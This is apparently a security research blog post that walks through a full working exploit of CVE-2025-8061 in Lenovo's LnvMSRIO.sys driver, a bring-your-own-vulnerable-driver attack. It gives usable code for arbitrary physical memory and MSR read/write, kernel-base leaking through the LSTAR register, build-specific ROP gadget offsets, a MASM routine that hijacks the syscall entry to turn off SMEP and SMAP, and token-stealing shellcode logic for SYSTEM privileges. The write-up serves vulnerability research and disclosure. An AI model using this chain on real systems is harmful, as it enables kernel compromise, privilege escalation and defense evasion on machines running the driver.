weaponizing-byovd-and-privilege-escalation

The complete source code and all supporting components are in the project repository: CVE-2025-8061. This series was inspired by Quarkslab’s article BYOVD to the next level.

Overview

This post documents the full exploitation of CVE-2025-8061, a vulnerability in Lenovo’s MSR I/O driver (LnvMSRIO.sys). The technique is known as BYOVD (Bring Your Own Vulnerable Driver). Rather than writing a kernel exploit from scratch, we abuse a legitimate, Microsoft-signed driver that has a vulnerability. The driver is already trusted by Windows, so it loads cleanly. The vulnerability gives us the primitives we need.

The driver exposes four IOCTL codes with no access control, letting any unprivileged usermode process read and write physical memory and CPU model-specific registers (MSRs) directly. From these primitives, we build a full Ring 0 code execution path and use it to steal the SYSTEM token.

The chain breaks into three stages:

Defeat kASLR: read the LSTAR MSR to leak KiSystemCall64, subtract a fixed offset, recover the kernel base
Gain kernel execution: overwrite LSTAR with a ROP gadget, fire a syscall, execute a token-theft payload
Escalate to SYSTEM: patch our process token, confirm with a system shell

Environment

Host, Fedora Linux: Code editing (VSCode), static analysis (IDA Pro), virtualization
WIN-DEV, Windows 10 22H2: Visual Studio 2022 + WDK, WinDbg kernel debugger
WIN-TARGET, Windows 11 24H2 (26100.1): Test target

WIN-TARGET was weakened as follows before any research began:

# Disable VBS and HVCI
reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v EnableVirtualizationBasedSecurity /t REG_DWORD /d 0 /f
reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v HypervisorEnforcedCodeIntegrity /t REG_DWORD /d 0 /f
reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity" /v Enabled /t REG_DWORD /d 0 /f

# Enable test signing and kernel debug
bcdedit /set testsigning on
bcdedit /debug on
bcdedit /dbgsettings net hostip:<WIN-DEV-IP> port:50000 key:1.2.3.4

Secure Boot was disabled at the QEMU firmware level by editing the VM XML:

<os firmware="efi">
  <type arch="x86_64" machine="pc-q35-10.1">hvm</type>
  <firmware>
    <feature enabled="no" name="enrolled-keys"/>
    <feature enabled="no" name="secure-boot"/>
  </firmware>
  <loader type="rom" format="qcow2">/usr/share/edk2/ovmf/OVMF.amdsev.fd</loader>
  <nvram template="/usr/share/edk2/ovmf/OVMF_VARS_4M.secboot.qcow2" templateFormat="qcow2" format="qcow2">/var/lib/libvirt/qemu/nvram/win11_VARS.qcow2</nvram>
  <boot dev="hd"/>
</os>

The Hyper-V vendor ID was also overridden to prevent KDNET from switching to an undocumented Hyper-V debug protocol:

<vendor_id state="on" value="KVMKVMKVM"/>

With this in place, the WinDbg connection over KDNET was confirmed.

Note on scope: WIN-TARGET was intentionally weakened (test signing on, HVCI off, Defender off) to allow loading unsigned drivers without the BYOVD chain. This is the controlled research environment. The BYOVD -> DSE bypass chain demonstrates the same result on a hardened target; see Part 2.

Section 1 — Driver Analysis

Finding the IOCTL Dispatcher

DriverEntry registers one function for Create, Close, and DeviceControl:

drvobj->MajorFunction[0]  = sub_140001580;   // IRP_MJ_CREATE
drvobj->MajorFunction[2]  = sub_140001580;   // IRP_MJ_CLOSE
drvobj->MajorFunction[14] = sub_140001580;   // IRP_MJ_DEVICE_CONTROL

sub_140001580 dispatches to sub-handlers based on the IOCTL code. There is no caller authentication and no handle privilege check. Any process that can open the device wins.

The four relevant codes:

0x9C406104: Physical memory read
0x9C40A108: Physical memory write
0x9C402084: MSR read
0x9C402088: MSR write

Physical Memory Read (0x9C406104)

After correcting types in IDA, the handler turns out to start with a length check:

if (InputBufferLength != 16) return STATUS_INVALID_PARAMETER;

So the input is exactly 16 bytes. The first field is passed directly to MmMapIoSpace as the first argument, confirming it’s a PHYSICAL_ADDRESS (8 bytes). Then there’s a size calculation:

NumberOfBytes = SystemBuffer->OperationType * SystemBuffer->HowMuch;
BaseAddress   = MmMapIoSpace(SystemBuffer->PhysicalAddress, NumberOfBytes, MmNonCached);

A switch on OperationType confirms valid values are 1, 2, or 8 (byte/word/qword copy variants). HowMuch is the element count. The struct:

typedef struct {
    UINT64 PhysicalAddress;  // physical address to map
    ULONG  OperationType;    // copy granularity: 1, 2, or 8
    ULONG  HowMuch;          // number of elements
} PHYS_READ_INPUT;           // sizeof == 16

The handler maps the physical address into kernel virtual space, copies OperationType × HowMuch bytes into the output buffer, unmaps, and returns. This lets any caller read arbitrary physical memory:

BOOL ReadPhysicalMemory(HANDLE hDevice, UINT64 physAddr, ULONG size, BYTE* outBuffer) {
    PHYS_READ_INPUT input = {
        .PhysicalAddress = physAddr,
        .OperationType   = 1,
        .HowMuch         = size
    };
    DWORD bytesReturned = 0;

    return DeviceIoControl(
        hDevice,
        IOCTL_READ_PHYS_MEM,       // 0x9C406104
        &input, sizeof(input),     // must be exactly 16 bytes
        outBuffer, size,
        &bytesReturned, NULL
    );
}

Usermode normally has no way to read physical address 0x1000 at all. Through this IOCTL the request goes through unchecked.
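The length arithmetic described above can be checked in isolation. This is a minimal sketch, not the driver's code: phys_read_length is a hypothetical helper name, fixed-width types stand in for the Windows typedefs, and the product is computed in 64 bits as an assumption (the driver's own integer width is not shown in the decompilation).

```c
#include <assert.h>
#include <stdint.h>

/* Same field order as PHYS_READ_INPUT, using fixed-width types. */
typedef struct {
    uint64_t PhysicalAddress;  /* physical address to map */
    uint32_t OperationType;    /* copy granularity: 1, 2, or 8 */
    uint32_t HowMuch;          /* number of elements */
} PHYS_READ_INPUT_LAYOUT;

/* The handler rejects any input that is not exactly 16 bytes. */
static_assert(sizeof(PHYS_READ_INPUT_LAYOUT) == 16, "input must be 16 bytes");

/* Hypothetical helper: bytes mapped and copied for one request,
 * or 0 when OperationType is not one of the accepted values. */
static uint64_t phys_read_length(uint32_t operation_type, uint32_t how_much)
{
    if (operation_type != 1 && operation_type != 2 && operation_type != 8)
        return 0;
    return (uint64_t)operation_type * how_much;
}
```

A byte-wise read of 4096 elements and a qword-wise read of 512 elements cover the same 4096 bytes, which is why the wrapper above can always use OperationType = 1 and pass the byte count as HowMuch.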

Physical Memory Write (0x9C40A108)

Same header struct, extended with a caller-supplied byte array. The handler maps the target physical address and copies Data into it:

typedef struct {
    UINT64 PhysicalAddress;
    ULONG  OperationType;
    ULONG  HowMuch;
    BYTE   Data[1];          // flexible array: payload bytes follow
} PHYS_WRITE_INPUT;

BOOL WritePhysicalMemory(HANDLE hDevice, UINT64 physAddr, BYTE* data, ULONG size) {
    ULONG totalSize = offsetof(PHYS_WRITE_INPUT, Data) + size;
    
    BYTE* inputBuf = (BYTE*)calloc(1, totalSize);
    if (!inputBuf) return FALSE;

    PHYS_WRITE_INPUT* input = (PHYS_WRITE_INPUT*)inputBuf;
    input->PhysicalAddress  = physAddr;
    input->OperationType    = 1;
    input->HowMuch          = size;
    memcpy(input->Data, data, size);

    DWORD bytesReturned = 0;
    BOOL success = DeviceIoControl(
        hDevice,
        IOCTL_WRITE_PHYS_MEM,
        inputBuf, totalSize,
        NULL, 0,
        &bytesReturned, NULL
    );

    free(inputBuf);
    return success;
}

Any usermode process can write arbitrary bytes to any physical address, in theory.

Section 2 — Physical Memory Primitives Hit a Wall

The natural first play is DKOM (Direct Kernel Object Manipulation). The plan: scan physical RAM for EPROCESS structures by pool tag, locate a target process, and patch its ActiveProcessLinks (Flink/Blink) to unlink it from the process list, effectively hiding it from the OS. In theory the scanner should run cleanly; in practice it hit a wall.

// Minimal EPROCESS overlay
#pragma pack(push, 1)
typedef struct {
    BYTE       _pad0[0x028];              // 0x000 skip to CR3
    UINT64     DirectoryTableBase;        // 0x028 physical address of page table
    BYTE       _pad1[0x1d0 - 0x030];      // skip to PID
    UINT64     UniqueProcessId;           // 0x1d0 PID
    LIST_ENTRY ActiveProcessLinks;        // 0x1d8 Flink + Blink (16 bytes)
    BYTE       _pad2[0x338 - 0x1d8 - 16]; // skip to name
    CHAR       ImageFileName[16];         // 0x338 null terminated, max 15 chars
} EPROCESS_OVERLAY;
#pragma pack(pop)

// EPROCESS scanner

// Scan one chunk of physical RAM for an EPROCESS matching targetName
// Returns physical base address of the EPROCESS, or 0 if not found
UINT64 ScanChunk(BYTE* chunk, UINT64 physBase,
                 ULONG size, const char* target) {

    for (ULONG i = 4; i < size - sizeof(EPROCESS_OVERLAY); i++) {

        // Look for pool tag 'Proc'
        if (*(UINT32*)(chunk + i) != EPROCESS_POOL_TAG)
            continue;

        // Pool tag is at byte 4 of the pool header
        // EPROCESS starts at: i - 4 (start of pool header) + 16 (header size)
        ULONG eprocOff = i - 4 + POOL_HEADER_SIZE;
        if (eprocOff + sizeof(EPROCESS_OVERLAY) > size)
            continue;

        // Cast the bytes directly to our overlay struct
        EPROCESS_OVERLAY* ep = (EPROCESS_OVERLAY*)(chunk + eprocOff);

        // Validate ImageFileName
        BOOL valid = TRUE;
        for (int c = 0; c < 15; c++) {
            char ch = ep->ImageFileName[c];
            if (ch == 0) break;
            if (ch < 0x20 || ch > 0x7E) { valid = FALSE; break; }
        }
        if (!valid) continue;

        // Check name match
        if (_strnicmp(ep->ImageFileName, target, 15) != 0)
            continue;

        UINT64 eprocPhys = physBase + eprocOff;
        printf("[+] Found '%.15s' | PID: %llu | Physical: 0x%llX\n",
            ep->ImageFileName,
            ep->UniqueProcessId,
            eprocPhys);

        return eprocPhys;
    }
    return 0;
}

UINT64 FindProcess(HANDLE hDev, const char* target) {
    printf("[*] Scanning physical RAM for '%s'...\n", target);

    UINT64 start     = 0x100000;     // skip legacy 1MB region
    UINT64 end       = 0x20000000;   // scan up to 512MB
    ULONG  chunkSize = 0x400000;     // 4MB per read

    BYTE* chunk = (BYTE*)malloc(chunkSize);
    if (!chunk) return 0;

    UINT64 result = 0;

    for (UINT64 addr = start; addr < end && !result; addr += chunkSize) {
        printf("\r[*] 0x%llX / 0x%llX", addr, end);
        fflush(stdout);

        if (!ReadPhysicalMemory(hDev, addr, chunkSize, chunk))
            continue;

        result = ScanChunk(chunk, addr, chunkSize, target);
    }

    free(chunk);
    printf("\n");
    return result;
}

// DKOM unlink
BOOL UnlinkProcess(HANDLE hDev, UINT64 eprocPhys) {

    // Read the full overlay to get Flink, Blink, and name
    EPROCESS_OVERLAY ep = { 0 };
    if (!ReadPhysicalMemory(hDev, eprocPhys, sizeof(ep), (BYTE*)&ep)) {
        printf("[-] Failed to read EPROCESS\n");
        return FALSE;
    }

    UINT64 flinkVirt = (UINT64)ep.ActiveProcessLinks.Flink;
    UINT64 blinkVirt = (UINT64)ep.ActiveProcessLinks.Blink;

    return TRUE;
}

Why this brute force crashed

Non-existent or reserved ranges in the VM’s physical layout have no valid PFN entry. Dereferencing a mapping into those pages is undefined behavior at the hardware level.
Cache type conflicts: MmMapIoSpace takes a MEMORY_CACHING_TYPE parameter. If a physical page already has an existing mapping with a different cache type, a second conflicting mapping causes a hardware-level cache consistency violation and immediately bugchecks. This is documented in exploit PoC notes for similar drivers.
The vulnerable driver does not check the return value of MmMapIoSpace. When the call fails and returns NULL, the handler dereferences the null pointer, which is itself a kernel panic independent of any PFN logic.

The primitive itself works correctly. The fundamental problem is that MmMapIoSpace takes a physical address, but everything we know about the kernel (exported symbols, leaked pointers, EPROCESS locations) is expressed as virtual addresses. Without a reliable VA->PA translation, we are flying blind.

Windows 10 version 1803 closed the historical way of doing that translation (mapping PTEs to walk the page tables manually). So the read/write primitive in isolation gives us a hammer with no way to know what we are hitting. Outflank describes this as the core obstacle: acquiring MmMapIoSpace access is the easy part; the hard part is always the VA->PA mapping.

Section 3 — MSR Primitives

What is an MSR? Model-Specific Registers are 64-bit CPU registers that control processor features and expose system state: power management, performance counters, syscall configuration, and more. They’re accessed with the privileged instructions RDMSR and WRMSR. From Ring 3, either instruction raises #GP (General Protection Fault) immediately. It’s hardware enforcement, not software policy.

The driver runs in Ring 0 and exposes both via IOCTL.

MSR Read (0x9C402084)

The handler, simplified from IDA:

v6[0] = __readmsr(SystemBuffer->Register);
store_to_out(OutputBuffer, 8, v6, 8);
*BytesReturned = 8;
return STATUS_SUCCESS;

Input is four bytes, just the MSR register number. Output is the 64-bit MSR value. The input struct:

typedef struct {
    ULONG Register;
} MSR_READ_INPUT;

UINT64 ReadMSR(HANDLE hDevice, ULONG msrRegister) {
    MSR_READ_INPUT input = { msrRegister };
    UINT64 result = 0;
    DWORD bytesReturned = 0;

    BOOL ok = DeviceIoControl(
        hDevice,
        IOCTL_READ_MSR,
        &input, sizeof(input),
        &result, sizeof(result),
        &bytesReturned, NULL
    );

    if (!ok) {
        printf("[-] ReadMSR failed. Error: %lu\n", GetLastError());
        return (UINT64)-1;   // sentinel: 0xFFFFFFFFFFFFFFFF
    }

    return result;
}

Defeating kASLR via LSTAR

What is kASLR? Kernel Address Space Layout Randomization randomizes the base address of ntoskrnl.exe on every boot. Without it, ROP gadgets, function pointers, and kernel structures sit at known addresses that an attacker can hardcode. With it, none of those addresses are predictable, so an attacker needs to leak a kernel pointer first.

What is LSTAR? LSTAR (0xC0000082) is the MSR the CPU reads on every SYSCALL instruction. It holds the virtual address of KiSystemCall64, the kernel’s syscall entry point, which lives inside ntoskrnl.exe at a fixed offset from the kernel base.

Because that offset is fixed for a given build, the kernel base follows from a single subtraction:

kernelBase = LSTAR - KiSystemCall64_offset

We can find the offset for our build 26100.1 using WinDbg:

kd> ? nt!KiSystemCall64 - nt
Evaluate expression: 6743616 = 00000000`0066e640

How do we leverage this? One IOCTL call leaks LSTAR, which is the absolute address of KiSystemCall64. Since we know its RVA, kASLR is done: the kernel base address is easily computed. This value will be very important later when constructing the ROP chain.
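As a worked instance of that subtraction, here is a minimal sketch. The RVA is the one printed by WinDbg above for build 26100.1; the helper name kernel_base_from_lstar is hypothetical, and the LSTAR value in the usage note is made up for illustration rather than taken from a real boot.

```c
#include <assert.h>
#include <stdint.h>

/* RVA of nt!KiSystemCall64 on build 26100.1 (from the WinDbg output). */
#define KISYSTEMCALL64_RVA 0x66e640ULL

/* Hypothetical helper: recover the kernel image base from a leaked LSTAR. */
static uint64_t kernel_base_from_lstar(uint64_t lstar)
{
    uint64_t base = lstar - KISYSTEMCALL64_RVA;

    /* Sanity check: images are mapped on page boundaries, so a result
     * that is not 4 KiB aligned means the RVA does not match the build. */
    assert((base & 0xFFFULL) == 0);
    return base;
}
```

With an illustrative LSTAR of 0xFFFFF8000066E640, the helper returns 0xFFFFF80000000000. The alignment assertion is a cheap guard against using an RVA from the wrong build.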

MSR Write — An Alignment Trap (0x9C402088)

The write handler calls:

__writemsr(SystemBuffer->Register, *&SystemBuffer->Value);

The expression *&SystemBuffer->Value takes the address of Value at offset 0x04 and dereferences it as a pointer to a 64-bit value, reading 8 bytes starting at +0x04. IDA’s auto-recovered struct showed Value as ULONG (4 bytes). That’s wrong, and it caused a silent failure.

The actual memory layout the driver expects:

Offset 0x00:  ULONG   Register   (4 bytes MSR index)
Offset 0x04:  ULONG   [low bits] (4 bytes low 32 bits of MSR value)
Offset 0x08:  ULONG   [hi bits]  (4 bytes high 32 bits of MSR value)

// Naive declaration: the compiler inserts 4 bytes of alignment padding
typedef struct {
    ULONG  Register;
    // [4 bytes of compiler padding here, UINT64 must be 8-byte aligned]
    UINT64 Value;
} MSR_WRITE_INPUT;

With natural alignment, the compiler places UINT64 at offset 0x08, not 0x04. When the driver reads 8 bytes at offset 0x04, it gets the padding zeros as the low 32 bits and the value’s own low 32 bits as the high 32 bits. The write lands scrambled. DeviceIoControl returns ERROR_GEN_FAILURE (error 31), and it took a while to figure out why.

The fix is #pragma pack(push, 1), which tells the compiler to emit fields back-to-back with no implicit padding:

// pack(1) suppresses padding; Value lands at offset 0x04
#pragma pack(push, 1)
typedef struct {
    ULONG  Register;   // offset 0x00
    UINT64 Value;      // offset 0x04, exactly where the driver dereferences
} MSR_WRITE_INPUT;
#pragma pack(pop)

BOOL WriteMSR(HANDLE hDevice, ULONG msrRegister, UINT64 value) {
    MSR_WRITE_INPUT input = { msrRegister, value };
    DWORD bytesReturned = 0;
    
    BOOL ok = DeviceIoControl(
        hDevice, 
        IOCTL_WRITE_MSR,
        &input, sizeof(input),
        NULL, 0,
        &bytesReturned, NULL
    );
    
    if (!ok) {
        printf("[-] WriteMSR failed. Error: %lu\n", GetLastError());
    }
    return ok;
}

The UINT64 now sits at offset 0x04, so when the driver dereferences 8 bytes at +0x04 it gets the full MSR value, low and high 32 bits in the correct order.
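The two layouts can be compared at compile time. The sketch below assumes a 64-bit little-endian target and uses fixed-width types in place of ULONG/UINT64; the struct names and the driver_view helper are hypothetical and only model how an 8-byte read at offset 0x04 interprets each layout.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Natural alignment: padding pushes Value to offset 8. */
typedef struct {
    uint32_t Register;
    uint64_t Value;
} MSR_WRITE_NATURAL;

/* pack(1): no padding, Value starts at offset 4. */
#pragma pack(push, 1)
typedef struct {
    uint32_t Register;
    uint64_t Value;
} MSR_WRITE_PACKED;
#pragma pack(pop)

static_assert(offsetof(MSR_WRITE_NATURAL, Value) == 8, "padded offset");
static_assert(sizeof(MSR_WRITE_NATURAL) == 16, "padded size");
static_assert(offsetof(MSR_WRITE_PACKED, Value) == 4, "packed offset");
static_assert(sizeof(MSR_WRITE_PACKED) == 12, "packed size");

/* Hypothetical model: place `value` at `value_offset` in a zeroed
 * 16-byte buffer, then read 8 bytes at offset 4 as the driver does. */
static uint64_t driver_view(size_t value_offset, uint64_t value)
{
    uint8_t buf[16] = {0};   /* zeroed, so padding bytes read as 0 */
    uint64_t seen;

    memcpy(buf + value_offset, &value, sizeof value);
    memcpy(&seen, buf + 4, sizeof seen);
    return seen;
}
```

Feeding 0x1122334455667788 through the padded layout yields 0x5566778800000000 (zeros in the low half, the value's low 32 bits in the high half), while the packed layout returns the value unchanged.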

We validate it against IA32_TSC_AUX (0xC0000103), the timestamp counter auxiliary register. It’s safe to write (no effect on execution or scheduling), and reading it back confirms round-trip fidelity.

Section 4 — SMAP: Effectively Unarmed

What is SMAP? Supervisor Mode Access Prevention prevents Ring 0 code from reading or writing usermode (Ring 3) memory pages. It’s controlled by bit 21 of CR4. When armed, any kernel access to a user page triggers a fault, unless RFLAGS.AC (bit 18, the Alignment Check flag) is set to 1, which temporarily suspends the protection.

The CVE documentation mentioned that AC can be flipped from usermode to bypass SMAP prior to triggering the vulnerable IOCTL. But it got me thinking: would KiSystemCall64, the normal syscall path, have cleared AC on entry anyway, effectively re-arming SMAP before execution ever reached the driver?

It’s a legitimate question, and not just academic. If flipping AC from usermode is all it takes to neuter SMAP, how strong is the protection really? The answer matters in a different exploit scenario, one without an MSR write primitive, relying instead on a normal syscall through KiSystemCall64. Does that path contain a CLAC somewhere in its prologue that would close this door?

The SYSCALL instruction itself masks RFLAGS on entry using the value in IA32_FMASK (0xC0000084). Any bit set there gets cleared on every syscall. Checking it in WinDbg:

kd> rdmsr 0xC0000084
msr[c0000084] = 00000000`00004700

0x4700 covers bits 8, 9, 10, and 14: TF, IF, DF, and NT. Bit 18 (0x40000), the AC flag, is not set. So SYSCALL leaves AC untouched.
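Decoding the mask bit by bit makes the result easy to verify. This is a small sketch with hypothetical helper names; the flag names cover only the RFLAGS bits relevant here.

```c
#include <stdint.h>
#include <stdio.h>

/* Returns 1 if SYSCALL clears the given RFLAGS bit under this IA32_FMASK. */
static int fmask_clears_bit(uint64_t fmask, unsigned bit)
{
    return (int)((fmask >> bit) & 1ULL);
}

/* Names for the RFLAGS bits discussed in this section. */
static const char *rflags_bit_name(unsigned bit)
{
    switch (bit) {
    case 8:  return "TF";
    case 9:  return "IF";
    case 10: return "DF";
    case 14: return "NT";
    case 18: return "AC";
    default: return "?";
    }
}

/* Print every RFLAGS bit that the mask clears on SYSCALL entry. */
static void print_fmask_bits(uint64_t fmask)
{
    for (unsigned bit = 0; bit < 64; bit++)
        if (fmask_clears_bit(fmask, bit))
            printf("bit %u (%s)\n", bit, rflags_bit_name(bit));
}
```

Calling print_fmask_bits(0x4700) lists four bits, and fmask_clears_bit(0x4700, 18) returns 0, which is the check that matters for SMAP.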

Test 1 — Is it Cleared Somewhere in the Function Prologue?

A minimal test driver reads RFLAGS at the very first instruction of IOCTL dispatch and prints bit 18:

NTSTATUS DeviceControl(PDEVICE_OBJECT DeviceObject, PIRP Irp) {
    unsigned __int64 current_rflags = __readeflags();

    DbgPrint("Current RFLAGS: 0x%llX\n", current_rflags);

    if (current_rflags & 0x40000)
        DbgPrint("[!] SMAP BYPASSED: AC bit survived the journey!\n");
    else
        DbgPrint("[*] SMAP ACTIVE: AC bit was cleared by kernel routing.\n");

    DbgBreakPoint();
    // ...
}

The usermode caller explicitly sets AC before the syscall via a small MASM stub:

SetAcBit PROC
    pushfq
    bts qword ptr [rsp], 18   ; set bit 18 (AC)
    popfq
    ret
SetAcBit ENDP

SetAcBit();    // flip AC in usermode
DeviceIoControl(hDevice, IOCTL_TEST_SMAP, ...);   // syscall into kernel

AC survived. No instruction anywhere in KiSystemCall64 cleared it.

Test 2 — Does That Mean SMAP Is Actually Bypassed?

The next question is whether AC=1 in the kernel actually suppresses a SMAP fault when raw user memory is dereferenced. A second driver checks both CR4[21] (SMAP armed) and RFLAGS[18] (AC state) on entry, then directly dereferences a usermode pointer passed in by the caller:

unsigned __int64 cr4_val   = __readcr4();
unsigned __int64 rflags_val = __readeflags();

int smap_bit = (cr4_val   >> 21) & 1;
int ac_bit   = (rflags_val >> 18) & 1;

DbgPrint("CR4:    0x%llX -> SMAP bit (21): %d\n", cr4_val,    smap_bit);
DbgPrint("RFLAGS: 0x%llX -> AC bit   (18): %d\n", rflags_val, ac_bit);

if (smap_bit == 1 && ac_bit == 1)
    DbgPrint("[!] SMAP armed, but AC=1 overrides it. No crash expected.\n");

// THE TRIPWIRE
volatile char testRead = *(volatile char*)UserModePointer;
DbgPrint("[!] NO BSOD. Read value: %c\n", testRead);

The usermode client passes a pointer to a stack-allocated string and never touches AC:

char mySecret[] = "X";
PVOID userPtr   = mySecret;
DeviceIoControl(hDevice, IOCTL_CRASH_TEST, &userPtr, sizeof(userPtr), NULL, 0, &bytesReturned, NULL);

No crash, and the AC bit was already 1 even though the client never called SetAcBit(). The kernel arrived at the driver with AC pre-set by default.

Test 3 — Is This a VM Artifact?

Maybe the hypervisor is doing something unusual with RFLAGS. To rule that out, the driver was extended to forcefully clear AC and then attempt the same dereference:

// Force AC to 0
__writeeflags(__readeflags() & ~0x40000ULL);

unsigned __int64 forced_rflags = __readeflags();
DbgPrint("Post-enforcement RFLAGS: 0x%llX -> AC bit: %d\n",
    forced_rflags, (forced_rflags >> 18) & 1);

// Same dereference
volatile char testRead = *(volatile char*)UserModePointer;

System crash. Clearing AC re-armed SMAP, and the dereference immediately faulted. So SMAP is real and functional; it’s just that the AC bit arrives in the kernel set by default, making it effectively pre-bypassed on every normal IOCTL path.

Conclusion

On Windows 11 without HVCI, SMAP provides no meaningful protection against a kernel-mode attacker. The AC bit survives the syscall transition unmodified, IA32_FMASK doesn’t cover it, and KiSystemCall64 doesn’t clear it. The IOCTL dispatch path enters driver code with AC=1 by default, pre-disarming SMAP before any attacker interaction.

Furthermore, Ring 0 code can freely manipulate RFLAGS.AC, so even if AC arrived at 0, any attacker with kernel execution can set it in a single instruction.

Without HVCI, SMAP is security theater. With HVCI, the hypervisor is doing the real work and SMAP is redundant. Either way, it’s not a meaningful barrier.

For the exploit, we make sure AC=1 in the forged RFLAGS, but as confirmed above, it’s already there.

Section 5 — Bypassing SMEP with ROP

What is SMEP? Supervisor Mode Execution Prevention prevents Ring 0 from executing pages marked as user-mode. It is controlled by bit 20 of CR4. Our shellcode lives in a VirtualAlloc’d RWX buffer in user space. Without disabling SMEP, the CPU faults the moment the instruction pointer enters it.

What is ROP? Return-Oriented Programming builds a chain of small instruction sequences (gadgets) already present in the kernel image, each ending in ret. Because the gadgets are at kernel addresses, SMEP doesn’t block them. By carefully controlling the stack, each ret chains to the next gadget, ultimately doing something useful. In this case, that means writing CR4 to disable both SMAP and SMEP.

Gadget Selection

rp++ --va 0 --rop 3 -f ntoskrnl.exe > rop.txt

Required gadgets and their offsets from kernel base on build 26100.1:

swapgs ; iretq (0xb55c22): Transition to kernel context via hardware frame
pop rcx ; ret (0x717c79): Load forged CR4 value into RCX
mov cr4, rcx ; ret (0x442c07): Write CR4, clearing SMEP + SMAP
swapgs ; sysret ; ret (0xb55e19): Return to usermode on the way out

Why iretq Instead of ret

There are no swapgs ; ret gadgets, only swapgs ; iretq. This matters because iretq (Interrupt Return, 64-bit) doesn’t just pop RIP. Per the Intel SDM, it pops a five-value hardware frame:

+00: RIP       <- where to resume
+08: CS        <- code segment selector
+10: RFLAGS    <- processor flags to restore
+18: RSP       <- stack pointer to restore
+20: SS        <- stack segment selector

All five must be valid and carefully forged. For kernel Ring 0 execution: CS = 0x10, SS = 0x18. RFLAGS must include AC=1. RSP must point to the remainder of our gadget chain.
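The frame layout and the RFLAGS adjustment can be written down as plain data. This is a sketch for checking offsets and bit arithmetic only; IRETQ_FRAME and rflags_with_ac_no_if are hypothetical names, and the offsets mirror the list above.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* The five quadwords IRETQ pops in 64-bit mode, lowest address first. */
typedef struct {
    uint64_t Rip;      /* +00 */
    uint64_t Cs;       /* +08 */
    uint64_t Rflags;   /* +10 */
    uint64_t Rsp;      /* +18 */
    uint64_t Ss;       /* +20 */
} IRETQ_FRAME;

static_assert(offsetof(IRETQ_FRAME, Cs) == 0x08, "CS offset");
static_assert(offsetof(IRETQ_FRAME, Rflags) == 0x10, "RFLAGS offset");
static_assert(offsetof(IRETQ_FRAME, Rsp) == 0x18, "RSP offset");
static_assert(offsetof(IRETQ_FRAME, Ss) == 0x20, "SS offset");
static_assert(sizeof(IRETQ_FRAME) == 0x28, "frame is five quadwords");

#define RFLAGS_IF (1ULL << 9)    /* Interrupt Flag */
#define RFLAGS_AC (1ULL << 18)   /* Alignment Check, suspends SMAP */

/* Hypothetical helper: RFLAGS image with IF cleared and AC set. */
static uint64_t rflags_with_ac_no_if(uint64_t current)
{
    return (current & ~RFLAGS_IF) | RFLAGS_AC;
}
```

For a typical usermode RFLAGS of 0x246, the helper returns 0x40046: bit 9 is dropped and bit 18 is added, with every other flag left as it was.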

CR4 Target Value

For now, we’ll read the original value from WinDbg on the target:

kd> r cr4
0x350ef8

SMEP is bit 20 (0x100000) and SMAP is bit 21 (0x200000); we clear both.

UINT64 CR4_original      = 0x350ef8;
UINT64 CR4_smep_smap_off = CR4_original & ~0x300000ULL;  // = 0x050ef8

Stack Layout

The PrepareStack MASM function builds the full stack before issuing syscall, which diverts to the ROP chain via the overwritten LSTAR:

.code
PUBLIC PrepareStack
PrepareStack PROC
    push    rbp
    mov     rbp, rsp
    push    r12                 ; save non-volatiles
    push    r13
    push    r14
    push    r15
    push    rbx

    ; Save original RFLAGS
    pushfq
    pop     rbx

    ; Read function arguments
    mov     r12, rcx            ; shellcode
    mov     r13, rdx            ; pop rcx ; ret
    mov     r14, r8             ; mov cr4, rcx ; ret
    mov     r15, r9             ; CR4 value

    ; Align stack to 16 bytes; iretq requires this
    and     rsp, -10h

    ; Push gadget chain data (what new_RSP points at after iretq)
    push    r12                 ; shellcode
    push    r14                 ; mov cr4, rcx ; ret
    push    r15                 ; CR4 value
    ; new_RSP = current RSP (points at CR4 value)
    mov     rcx, rsp

    ; Push iretq frame
    push    18h                 ; SS
    push    rcx                 ; new RSP
    
    mov     rax, rbx
    btr     rax, 9        ; Bit 9 is IF (Interrupt Flag). btr clears it to 0.
    bts     rax, 18       ; Bit 18 is AC (Alignment Check). bts sets it to 1.
    push    rax           ; RFLAGS slot of the frame, popped later by iretq
    push    rax           ; second copy of the modified RFLAGS
    popfq                 ; load it into the live RFLAGS now

    push    10h                 ; CS
    push    r13                 ; RIP = pop rcx ; ret

    ; Fire the exploit
    lea r12, after_syscall ; Put the return address in R12
    syscall                ; LSTAR jumps to ROP -> Shellcode

after_syscall:
    ; restore saved registers
    ...
    ret
        
PrepareStack ENDP
END

Execution flow after syscall: LSTAR now points to swapgs ; iretq. iretq consumes the frame (CS=0x10, RFLAGS with AC=1, RSP to chain data, SS=0x18, RIP=pop rcx ; ret). Then: pop rcx loads CR4_smep_smap_off, mov cr4, rcx disables SMEP+SMAP, ret jumps to shellcode.

Section 6 — The Shellcode: Token Theft

With SMEP off and Ring 0 execution confirmed, the payload walks KTHREAD -> EPROCESS -> ActiveProcessLinks to find System (PID 4) and copies its security token to our process.

What is token theft? Every Windows process has a security token that defines what it can do: user SID, privileges, integrity level. The kernel’s System process runs with the most privileged token possible. By overwriting our process’s token pointer with System’s token pointer, we inherit those privileges without spawning a new process or touching LSASS.

Logic (Pseudocode)

KTHREAD  = gs:[0x188];                         // current thread
EPROCESS = *(KTHREAD + KTHREAD_EPROCESS_OFFSET);  // our EPROCESS (pointer stored in KTHREAD)
our_proc = EPROCESS;
walker   = EPROCESS;

// Walk the doubly-linked EPROCESS list
do {
    walker = walker->ActiveProcessLinks.Flink - EPROCESS_LINKS_OFFSET;
} while (walker->UniqueProcessId != 4);        // PID 4 == System

// Steal System's token, masking off the low nibble (EX_FAST_REF reference count)
our_proc->Token = walker->Token & ~0xFULL;

The shellcode is built dynamically from raw opcodes in the exploit binary before execution. This lets us embed the LSTAR value, gadget addresses, and kernel base directly at runtime without a separate compiled blob.

Before returning, the shellcode: restores LSTAR to the original KiSystemCall64 address (future syscalls must work), restores SMEP+SMAP via a second ROP stub, and returns to usermode via swapgs ; sysret.

Note that for the exploit to work, our process should be pinned to one core and run at the highest scheduling priority.

SetProcessAffinityMask(GetCurrentProcess(), 1); 
SetThreadAffinityMask(GetCurrentThread(), 1);

MSRs (Model-Specific Registers) are per logical core.

